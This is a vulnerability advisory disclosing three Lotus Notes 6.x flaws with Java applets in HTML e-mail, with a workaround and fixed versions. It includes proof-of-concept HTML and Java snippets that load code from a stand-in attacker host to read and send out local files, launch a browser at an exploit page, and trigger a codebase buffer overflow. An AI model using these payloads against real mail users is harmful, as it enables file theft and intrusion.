Lotus Notes Java Applet vulnerabilities

Overview

Lotus Notes is a groupware/e-mail system developed by Lotus Software. Due to its security and collaboration features it’s used particularly by large organizations, government agencies, etc. IBM estimates it is used by 60 million people.

These are some technical details of three Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during July-August 2004.

Details

The vulnerabilities involve Java applets embedded in HTML formatted e-mail messages. A contributing factor in all of the issues is, that such Java applets are automatically displayed when the e-mail message is viewed.

Vulnerability 1: global file read access

An e-mail message containing a Java Applet with the codebase “file:///” gains unlimited read access to local files when the e-mail is viewed. An example HTML snippet follows:

  <applet codebase="file:///" archive="http://www.attacker.tld/applet.jar"
   width="1" height="1"></applet>

The applet’s Java bytecode itself needn’t be contained in the e-mail but it’s only referenced by the archive URL. The applet gets automatically loaded when the e-mail is viewed. It has file read access on the local system (can read whatever files the currently logged in user can). The applet can use e.g. JavaScript to relay the files to the attacker.

Vulnerability 2: launching web browser

A Java applet embedded in the same way can forcibly launch a web browser with the desired URL when an e-mail message is viewed. An example piece of Java code to do this follows:

  public void init() {
    getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
  }

Under default settings, Internet Explorer is launched and the attacker supplied URL is opened in it when the e-mail message is viewed. This exposes the system to Internet Explorer vulnerabilities, greatly widening the attack surface.

Vulnerability 3: codebase buffer overflow

Opening an HTML mail message which contains an applet tag with a long codebase parameter (over 500 bytes) causes an apparently stack-based buffer overflow condition. It may be exploitable to run arbitrary code on the victim system when the e-mail message is viewed. This is an example piece of HTML to produce it:

 <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
  code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.

Workaround

Disabling Java applets can be used to protect from these vulnerabilities. To disable Java applets, select File -> Preferences -> User Preferences from the Notes client menu and uncheck the option for “Enable Java applets.”

Solution

The issues have been addressed in Lotus Notes versions 6.5.4 and 6.0.5. For detailed fix information, see http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en

Credits

The vulnerabilities were discovered and researched by Jouko Pynnönen, Klikki Oy, Finland.